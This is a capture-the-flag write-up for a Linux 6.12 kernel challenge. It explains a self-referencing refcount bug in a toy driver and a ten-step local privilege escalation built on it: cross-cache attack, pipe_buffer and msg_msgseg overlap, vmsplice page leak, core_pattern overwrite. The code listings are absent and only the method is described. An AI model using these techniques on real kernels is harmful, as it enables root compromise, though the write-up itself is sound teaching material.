Level 2 - not quite baby kernel (linux kernel pwn)

Linux kernel heap pwn

This was the most challenging of the 3 pwnables challenges, and I took about 2 weeks to solve it. It was especially hard given my lack of background in kernel pwn. Fortunately I eventually solved it (although not in the intended way :P)

Challenge files:

24MB
Open

The challenge provides us with the following files:

- src
  - paradox.c
  - Makefile
- bzImage
- kernel_config_linux-6.12.38
- rootfs.cpio.gz
- start.sh  

Namely, paradox.c is the C code which implements the vulnerable linux driver, and the Makefile specifies how to compile it. bzImage is a compressed kernel image file, kernel_config_linux-6.12.38 specifies all the config options of the linux kernel, rootfs.cpio.gz is the compressed filesystem, and start.sh runs the kernel.

Before delving into paradox.c let's cover some setup first:

We start by inspecting start.sh to understand the protections the kernel has:

#!/bin/sh

cd "$(dirname "$0")" || exit 1
qemu-system-x86_64 -m 128M \
	-monitor /dev/null \
	-serial stdio \
	-smp cores=2 \
	-kernel ./bzImage \
	-initrd ./rootfs.cpio.gz \
	-nographic \
	--append "console=ttyS0 kaslr loglevel=2" \
	-nographic \
	-cpu kvm64,+smap,+smep \
	-enable-kvm 

We can see that kaslr is enabled (which means that kernel functions are at a randomised address), and smap and smep are enabled. This means that when in kernel mode, we cannot use data from user pages, and we also cannot run code in user pages.

To make it easier to debug, you should disable kaslr temporarily, and add -s to tell QEMU to open a GDB server on tcp port 1234, and -no-reboot and -no-shutdown so we can stop and see when a kernel crash occurs. Your start.sh will now look like this:

To decompress rootfs.cpio.gz into an actual folder we can use the below decompress.sh:

Now I prepare my workflow to compile exploit C code and re-compress the filesystem back into rootfs.cpio.gz, using mycompress.sh and compress.sh.

mycompress.sh:

compress.sh:

Now that the prep work is done, let's look at paradox.c:

To be honest, it's quite alot of code, so let me summarise what's going on:

There are 3 main structs, temporal_event and timeline. They have the following structures:

paradox_engine_open

Each file descriptor that you open when you do open("/dev/paradox_engine", O_RDONLY) invokes paradox_engine_open, which instantiates the session by associating a paradox_session_data with it. We know this because it does

It also instantiates a timeline object and calls it the primordial timeline, and creates a temporal_event called the first cause. Each session has a list of all timelines, while each timeline has an event it is caused by and a list of events within that timeline.

As for the temporal event, note the following:

The temporal event comes from its own dedicated cache. This will be important later.

Also note that this event has its refcount causal_weight set to 1.

paradox_engine_ioctl

This function essentially specifies the ways in which a user can interact with the device. In particular, they can choose to either create a timeline or create an event.

Create timeline

Request structure:

ioctl code:

When creating a timeline, a user must specify the timeline and its event which caused this new timeline to occur. The timeline is created with the next id available, and it is added to the session. The event that caused this timeline gets event_get called on it, which basically increases the refcount causal_weight. If the request was successful, the new timeline's id is returned to the user.

Create event

Request structure:

ioctl code:

Once again the event is allocated from the temporal_event_cache and its data is zeroed. Its refcount is initialised to 1. The user's description is copied to the object, and the event that caused this event to happened has its refcount increased by 1. If req.cause_event_id is 0, however, that means that the new event isn't caused by another event. If the request is successful, the driver returns the event's id to the user.

Looking for the vuln

For some background, refcount bugs are rather common, and are usually used to count how many times an object was referred to. When its refcount drops to 0 it is usually freed. This case is no different: When event_put is called on an object and its refcount goes from 1 -> 0, the object is freed:

It actually took me some time (and gpting) to figure out the vuln, but eventually I realised a problem: When we create a temporal event, the event is added to its timeline BEFORE we run the following if block:

This results in it being possible for an event to have itself as its causal dependency.

paradox_engine_release

Let's see the implication of this in paradox_engine_release, which is called when the driver is closed:

It iterates through each timeline. Within each timeline it iterates through each event, and walks its cause = event->causal_dependency, calling event_put every time it finds a new cause. Once that's done, the pointer to its causal_dependency is zeroed, and the event itself has event_put called on it.

Then it iterates through each timeline in the session, calling event_put on the event which caused the timeline. Finally the timeline is freed.

Thereafter, the session is freed.

Implications

If an event has itself as a causal_dependency, what happens is that when we close the driver, the loop

perpetually has the same event as its cause, and keeps calling event_put on it. Let's look at event_put again:

What this means is that whenever the refcount causal_weight hits 0 the event gets kfreed. What happens if it goes below 0 (which occurs when the self-referring event gets freed)? Apparently, this causes the refcount to underflow to a value such as 0xC0000000 or 0xBFFFFFFF. It DOES NOT immediately lead to a double-free, and the kfree will still only occur once.

๐Ÿ› More tips for debugging

Before exploitation, you may also find the following helpful to make debugging easier:

  • Using the linux source code for linux 6.12.38 from https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.12.38.tar.xz, you should recompile the kernel with debugging symbols. Most CTF challenges (including this one) do not provide kernels with debugging symbols.

    • If you don't want to do this, you can also use this tool to convert the compressed bzImage into an uncompressed vmlinux, then use this tool to convert the vmlinux to an elf. This should be able to recover most symbols to make debugging easier. Then, to debug, do gdb ./kernelelf then target remote :1234 when your kernel is running

  • Use the bata24 gef debugger, it is ahead of pwndbg and the main gef fork. It comes with many features supporting kernel debugging. I found the commands pagewalk-with-hints, slub-dump, xf and slab-contains most helpful.

    • To easily find the victim object when debugging, all I needed to do was find its description using xf "self-referring event"

Verifying trivial wins

Take note that there can actually be trivial leaks in kernel challenges via dmesg or kernel warnings or similar. However, in init.sh we see these two lines:

so trivial leaks are unfortunately out of the question.

I also tried to look for n-days in the given linux kernel itself, but unfortunately couldn't find any.

Exploitation

Here are the high-level steps my exploit follows, which I will elaborate on later:

  1. Perform a cross-cache attack on a self-referring event, ensuring that its page can get reclaimed by a CPU we control.

  2. Spray pipe_buffer and reclaim the page with the page data of the pipe_buffer. Write bytes into all the pipe_buffers until we find which one's page reclaimed the victim, and the offset of the victim temporal_event in the page.

  3. Spray ENLARGED pipe_buffers so that the pipe_buffer struct reclaims an order 9/10 page.

    1. Write 1 byte into each pipe fd then read 1 byte from it to fill the first pipe. Subsequent writes/splices will use the second pipe in the ring.

  4. Reset the victim's refcount to 1, and partially overwrite the victims temporal_event * to point to the previously reclaimed order 9/10 page. The infinite loop causes that page to get kfreed.

  5. Reclaim the previously order 9/10 page by spraying msg_msgseg. This "releases" the infinite loop and the CPU that was previously running the loop. We not have a msg_msgseg overlapping multiple pipe_buffers.

  6. Call syscall vmsplice to vDSO memory page into the pipe_buffers from stage 3. This causes the second pipe in the UAF'd page to have its struct page address point to a page responsible for kernel text.

  7. Read from msg_msgseg to leak the address of the page * for kernel text.

  8. Prepare a fake pipe buffer with page and offset value calculated point to the core_pattern page's address and set PIPE_BUF_FLAG_CAN_MERGE for the pipe flags.

  9. Reclaim the previously freed msg_msgseg by spraying msg_msgseg again, overwriting the second pipe_buffer in the UAF'd page with the page * for core_pattern.

  10. Write to the pipe_buffer to overwrite core_pattern, and trigger a crash to get a root shell.

Part 1. Cross-cache attack

Remember how earlier we said that temporal events are allocated using a dedicated cache because we do this?:

This makes exploitation more difficult because when we free a temporal_event the page still belongs in temporal_event_cache . When we then allocate other objects, they use pages from different caches. i.e. they will not make use of the freed page (and thus not use our victim object!)

But there is a technique called cross-cache attack which allows us to still make this happen. The cross-cache attack allows the victim page to be reclaimed by any other object, reopening more exploitation techniques!

To perform this technique, I found these black hat slides particularly instructional. The gist of it is:

  1. Pin task to a CPU

  2. Drain partially free slabs

  3. Allocate objs_per_slab * (1 + cpu_partial) objects (you can find these in /sys/kernel/slab/temporal_event_cache/cpu_partial and /sys/kernel/slab/temporal_event_cache/objs_per_slab )

  1. Allocate objs_per_slab - 1 objects as pre-alloc objects

  2. Allocate victim object

  3. Allocate objs_per_slab + 1 objects as post-alloc objects

  4. Free victim, pre-alloc and post-alloc objects

  5. Free one object per slab from step 2

    1. This triggers flushing of CPU partial list, allowing the victim slab to be released to the page allocator

At this point my code for the cross-cache attack looked something like this:

Note that regardless of which fd you use to create events, they use the same cache and pages. Essentially the events created on fd2 would get freed first on cpu1 followed by the events created on fd1 which would get freed on cpu0.

My intention was for the (OBJS_PER_SLAB - 1) * CPU_PARTIAL objects and the self-referring event to be freed first on cpu1. Thereafter, the pre-alloc and post-alloc objects would be free on cpu0.

This was a costly mistake, since freeing the self-referring event on cpu1 first causes the victim page to be on cpu1's per-cpu partial list, and cpu1 was the cpu with the infinite loop which I couldn't control.

๐Ÿง  The solution to this was quite simple: Instead of freeing the self-referring event first, free the pre-alloc and post-alloc objects first!

Here's the final working cross-cache code:

Half of the pre- and post-alloc objects are in fd1, while half are in fd5. The self-referring object uses fd2.

โ— The key difference is: I first close fd5 to free half the pre- and post- alloc objects in CPU 0, to get the victim slab in CPU 0's partial list

With this, after the cross-cache attack my victim page was in the free area and could be reclaimed by CPU 0!

Part 2. Spraying pipe_buffer to reclaim victim page

When we inspect the victim page, this is what we will see:

For reference here's the temporal_event struct:

Notice that the victim object is from 0xffff888006494bd0 - 0xffff888006494c3f while the post-alloc object is from 0xffff888006494c40 - 0xffff888006494caf

Furthermore, note that the victim's refcount is at 0xbfffffff meaning it has underflowed, and its causal_dependency pointer is pointing to itself at 0xffff888006494bd0 .

โœ๏ธ Another important note is that all the objects are spaced 0x70 = 112 bytes apart. This is a highly abnormal size which was made possible by the use of the dedicated slab cache. In practice, it is very difficult for us to find exploitable kernel objects of this exact size. Ideally we would want the object to have the same size as other objects in the kmalloc- or kmalloc-cg- caches.

โš ๏ธ If we tried to reclaim the page by spraying objects of a different size, and accidentally overwrite the causal_dependency pointer with an invalid non-null value, when the paradox_engine_release dereferences the pointer in the loop, the kernel would crash!

๐Ÿง  If we just overwrite causal_dependency with NULL, the loop simply terminates, and we don't use the infinite loop to kfree anything else. We basically "waste" the vulnerability.

๐Ÿ‘€ Ideally, we want to reclaim it with something that we can control so that we can control what we kfree next! If we overwrite the refcount to 1, and overwrite causal_dependency to something that can be kfreed, we will have a double allocation! But the problem with this is that we don't have any leaks ๐Ÿ˜ข, so we don't know what to overwrite it with either!

๐Ÿ’ก The eureka moment

I spent quite a few days spraying different objects to find out what could be a possible solution. As I was playing with pipe_buffer, I realised that very often the page storing the buffer's data would reclaim the victim page, and the data I write into the pipe would overwrite the bytes in the victim page. When we write into this page, we can overwrite the causal_weight refcount, followed by the temporal_event * .

This got me wondering: Is it possible that writing into this pipe could allow partial overwrites? What if instead of overwriting all 8 bytes of the temporal_event * I could just overwrite 1, or 2, or 3? ๐Ÿค”

It turns out, you can!

Now let's think about what we can do with this in mind:

  • Spray pipe_buffer , one of their pages will reclaim the victim page

  • Since the refcount is always +0x8-bytes aligned, first write 0x10 bytes into each pipe. Then read those 0x10 bytes to see if the last 8 bytes had changed, for example from \x00\x00\x00\x00\x00\x00\x00\x01 to \x00\x00\x00\x00\xc0\x00\x00\x00 or to \x00\x00\x00\x00\xbf\xff\xff\xff . If they did change, then we know that the victim object is at offset +0x000 within the victim page, and we will also know which pipe holds the victim page.

    • Otherwise if the victim object is not at offset +0x000, we repeat the previous step, but this time writing 0x20 bytes and reading 0x20 bytes. We repeat this until we find the offset of the victim object within the victim page, and we know which pipe holds the victim page.

In doing these, we have found the pipe holding the victim page and the offset of the victim object within the victim page, and we also haven't touched the temporal_event * pointer. That's great!

โ“ Now the question is: What do we do with our partial overwrite primitive on the temporal_event *? To answer this question, I took a quick look at the pages in the page allocator using the buddy-dump command to see if there was anything useful. Note that at this point, my temporal_event * was 0xffff888006494bd0.

I saw this:

What is "order"?

The buddy allocator maintains blocks of free pages where each block is a power of two number of pages. The exponent for the power of two sized block is referred to as the order. If your order is 3 for example, that means that the block has 232^3 pages.

View this page for more info.

This is great for two reasons:

  1. If I overwrite the least significant 3 bytes of temporal_event * to \x60\x00\x00 I would be able to get this exact address

  2. This pattern is consistent across reboots! Let's see another run:

Self-referring event at 0xffff88800654ea80, order 9 unmovable page at 0xffff888006600000 :

๐Ÿ‘ So if we do something like this:

  • Spray an object X to reclaim the order-9 page

  • Partial overwrite temporal_event * to trigger kfree on its address

  • Spray another object Y to reclaim the page again,

We could achieve an overlap between objects X and Y! Wonderful!

Part 3. Spraying enlarged pipe_buffers to claim the order-9 page

Now I was once again on the hunt for a new object. It had to be relatively large so that I could get it to use the order-9 page within a reasonable time, and also

โš ๏ธ Ideally at offset +0x10 it should have NULL. Why? Look at temporal_event and the infinite loop again:

In the first round of the loop, after we set refcount = 1 and do the partial overwrite, next_in_chain would be our page address. This then becomes cause.

In the second round of the loop, next_in_chain would be whatever is at page+0x10 .

If page+0x10 is not null, the third round of the loop would do cause->causal_dependency (which is actually (*cause).causal_dependency ) and dereference the value at page+0x10 .

We also have a third requirement: Whatever is at offset +0x8 of the page overlaps with what the program thinks is the temporal_event's refcount, so we should be able to set this to one if we actually want the reclaiming object to get freed using event_put.

๐Ÿ“œ To summarise what we need of object X:

  • Relatively large

  • Value at +0x10 is (hopefully) null

  • Value at +0x8 == 1

I was once again stuck at this point for several days. And then I saw the light. How? By again playing with pipe_buffer. Let's look closely at this bad boy, shall we?

โ—Note that pipe_buffer structs don't exist in isolation; rather, they are allocated as a consecutive array of pipe buffers. In fact, there is another struct called pipe_inode_info which points to a ring of pipe_buffers in its pipe_inode_info.buf field.

๐ŸŸข pipe_buffer actually satisfies the "relatively large" requirement since we can enlarge the array via the function fcntl(pipe_fd, F_SETPIPE_SZ, PAGE_SIZE * n) which changes the pipe ring size. (Here n should be a power of 2 according to this).

๐ŸŸข pipe_buffer also satisfies the third requirement since we can control the value of pipe_buffer->offset by reading from it.

At first glance, it seems useless as it literally has a pointer at offset +0x10. If we simply create a pipe_buffer object in our page then trigger the vulnerability, we would get cooked as *ops gets dereferenced and we get a crash somewhere down the line.

๐Ÿ‘ผ But here's our saving grace: When a pipe_buffer gets released, its ops field actually gets nulled! This is fantastic for us, since we can simply allocate then release the first pipe_buffer in the ring to null out whatever is at offset +0x10! We are still free to use the rest of the pipe_buffers in the page for exploitation.

There's a catch, however: a non-privileged user has a limit to the max pipe_buffer size they can allocate, and this can be checked in /proc/sys/fs/pipe-max-size:

After spraying a bit (and praying), I found that spraying just 50 of these max-sized pipes was sufficient to consistently claim the order-9 page.

So for this step, basically just spray 50 of these max-sized pipes, and write and read 1 byte from each of them to trigger their release, which will NULL out the ops pointer. Simultaneously, writing and reading 1 byte from it causes pipe_buffer->offset = 1 which allows the page to be freed when event_put is called on the page!

Here's the code for this part:

Part 4. Trigger vuln

As discussed previously, overwrite the victim object, setting its refcount to 1 and overwriting the least significant 3 bytes to \x60\x00\x00. This should cause the page claimed in the previous step to now be freed!

To do so, free the victim pipe whose id we now know, and spray pipe_buffer again.

The issue here was that freeing this victim pipe sometimes caused the page to go into CPU 1's partial list, which I did not have control of. This could have been due to some balancing of cpu partial lists. To deal with this issue, I create some dummy pipe_buffers by calling pipe then writing into each pipe, and closed them before closing the victim pipe.

โ— This reclamation is only successful slightly less than 50% of the time, and it's where my exploit loses the bulk of its consistency.

Code:

Part 5. Overlapping objects X and Y

Now we need to choose an object Y which will overlap with our array of pipe_buffers . Note that as the vuln triggers a kfree in CPU 1 (as our infinite loop occurred in CPU 1), this part has to be done in CPU 1. I achieved this by creating a thread and pinning it to CPU 1.

Note that our object here should claim a page of order โ‰ค\leq 2 because the re-released page is of order 2:

The ideal candidate here, of course, would be msg_msgseg since we pretty much get arbitrary read + write over the entire struct, and we can modify its size by controlling the size of the data we send using msgsnd. As we can freely modify its size, we can also control the order of the page it reclaims.

Background on System V IPC

Function Signatures:

Sending messages via System V IPC first needs you to create a message queue as follows:

Then using the queue id, you can send a message as such:

and receive them as such:

Note: In msgrcv, you can specify IPC_NOWAIT | MSG_COPY if you don't want the underlying msg_msg or msg_msgseg structs to be freed when the message is received

Note: Specifying the message's mtype when sending and receiving messages allows you to specify which message you want. If your msgrcv mtype is 0, you just get the first message in the queue.

What is msg_msgseg?

First, understand that the size of a msg_msg struct is 0x30, and the rest of the struct is the transmitted data. If the data sent exceeds (0x1000 - 0x30) = 0xfd0 bytes, the remaining data is transmitted in a msg_msgseg struct. msg_msgseg struct has an 8-byte pointer, and user data comes after.

I went ahead with a 0x400-sized msg_msgseg spray, and my msg_msgseg goes into kmalloc-cg-1k. When we do slub-dump kmalloc-cg-1k in gef, we can clearly see that the page order is 2, because num pages: 4. Therefore it is a good size to choose to maximise the chance of msg_msgseg reclaiming the page!

Here's my code for this segment:

Part 6. vmsplice syscall

Now that we have overlapping msg_msgseg and pipe_buffer structs, we need to think of how to get LPE.

โŒ One option was getting a text leak from pipe_buffer->ops , then replacing it with a stack pivot gadget and doing kROP. But this won't work since SMAP and SMEP are enabled.

After some research, I came across this exploit which had a similar msg_msgseg and pipe_buffer overlap.

What is vdso?

Wikipedia: vDSO (virtual dynamic shared object) is a kernel mechanism for exporting a carefully selected set of kernel space routines to user space applications so that applications can call these kernel space routines in-process, without incurring the performance penalty of a mode switch from user mode to kernel mode that is inherent when calling these same kernel space routines by means of the system call interface.

While vDSO is provided by the kernel, it resides within the user-space portion of a process's virtual address space.

By doing something like this:

We cause pipe_buffer->page to refer to the page struct corresponding to vDSO. That is, a page responsible for kernel text.

๐Ÿค” Why is this helpful?

With a leaked page* pointer from the pipe_buffer, we can change it to be the page responsible for any region of kernel text! We'll see why this is useful later.

Part 7. Leaking page* of kernel text

To recap what we've done, we:

  1. Sprayed msg_msgseg into the first 0x400 bytes of the page to reclaim the order 2 page

  2. Overwrote some of the msg_msgseg (to be specific the second chunk of 0x28 bytes) using the spliced pipe_buffer, whose page * is responsible for vDSO

Now if we read from msg_msgseg we can get the page * leak! (Note: the ops * leak isn't really necessary)

Part 8 + 9. Overwriting the second pipe

Now what can we do with the page * leak? Well, there happens to be a region of kernel text called the core_pattern, which basically tells the kernel what to do when there's a crash.

In the linux kernel documentation /usr/src/linux/Documentation/sysctl/kernel.txt.

[/proc/sys/kernel/]core_pattern is used to specify a core dumpfile pattern name.

  • If the first character of the pattern is a '|', the kernel will treat the rest of the pattern as a command to run. The core dump will be written to the standard input of that program instead of to a file.

In other words, overwriting the core_pattern with something starting with '|' results in whatever comes after as a command which will be run in kernel mode!

But the question now is: Sure, we know the address of the page * pointing to vDSO, but how do we know the address of the page * responsible for core_pattern? It turns out that the offset between them is constant. By calculating the offset between the vDSO and core_pattern virtual addresses we can also calculate the offset between their respective page * structs!

In my case, I found:

The difference between the address of the pages of vdso_image_64.data and core_pattern is 0x438000. For every 0x1000 byte page, there is a 64 byte struct page* stored in vmemmap, so to calculate the difference between struct page* addresses, you have to do: 0x438000 / 4096 * 64 which equals to 0x863000 >> 6

Looking at the pre-overwritten pipe_buffer:

the len = 1 already. By leaving the len untouched and setting pipe_buffer->offset = 0xa60 - 1 we can change the entire content of core_pattern! We also need to add the PIPE_BUF_FLAG_CAN_MERGE flag to pipe_buffer->flags to allow every pipe write to also write to the physical page.

Here's the code for this part:

Part 10. Setting up the command + executing it for root shell

We still need to decide what to write into the core_pattern which will give us LPE when a crash is triggered. I used the same method as this exploit, which was to overwrite it with |/proc/%P/fd/666 %P\n. Doing so causes the kernel to execute whatever process is on the crashing process' FD 666, passing the PID as an argument.

Then consider the following main:

The child process:

  • Creates an in-memory file and copies the program's ELF image into it

  • Moves it to fd 666, so it is reachable at /proc/CHILD-PID/fd/666

  • Waits for the parent's signal that the exploit is finished by doing read(cfd[0], dummybuf, 1)

When write(cfd[1], dummybuf, 1) is executed, the parent signals to the child it is done.

The child then triggers a crash by dereferencing NULL, causing the code which we wrote into core_pattern to be executed. This causes the executable at /proc/CHILD-PID/fd/666 to be executed with an argument, giving us a root shell and reading the flag.

Compiling and sending the exploit to remote

According to ptr-yudai's blog post, it usually works fine if you use musl-gcc to compile your exploit code (with the effect of making the binary much smaller), and sending it to remote as base64. However, for some reason my exploit wasn't working once I used musl-gcc to compile it. The third LSB to overwrite in the partial-overwrite stage had changed. The exploit worked once I changed that.

I also used the following uploader.py (generated by ChatGPT) to automate the PoW solving, sending of base64 and decoding it to the binary:

Afterthoughts

Although I spent a really long time on this challenge, on hindsight it was a really good idea to persevere with it. I learnt a ton about the workings of the linux kernel's allocators and numerous linux kernel exploit techniques.

Final code

Note: There is some unused code in here, but if you followed the entire post you should be able to comprehend the code just fine! ๐Ÿ˜„

Last updated